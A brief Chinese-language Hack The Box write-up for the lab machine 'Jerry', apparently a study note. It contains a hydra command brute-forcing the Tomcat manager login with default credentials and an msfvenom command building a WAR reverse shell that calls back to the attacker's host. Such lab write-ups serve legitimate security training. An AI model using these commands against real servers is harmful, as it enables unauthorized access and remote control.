HTB 学习笔记
【Hack The Box】windows练习-- jerry
🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年10月31日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!
信息收集
发现开启了tomcat
首先,关于tomcat,我们要明确两点(第一就是/manager目录,看是否存在,如果存在,是否存在弱口令,弱口令要么去网上找,要么就直接爆破)
然后就是如果爆破的话,一般在manager后面还会有个html,当你点击取消的时候你就会发现
hydra -C ./Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http-get://10.129.8.70:8080/manager/html
爆破出来之后先登陆admin的,发现啥都没有,就退回来登陆另一个
发现后台,然后就是常见的rar的反弹shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.6 LPORT=8888 -f war > shell.war
在我们上传之后会自动的跳出文件页面,我们只需要点击一下,就能拿到反弹shell
然后去桌面找,就能找到,这里注意,带空格的文件名需要引号起来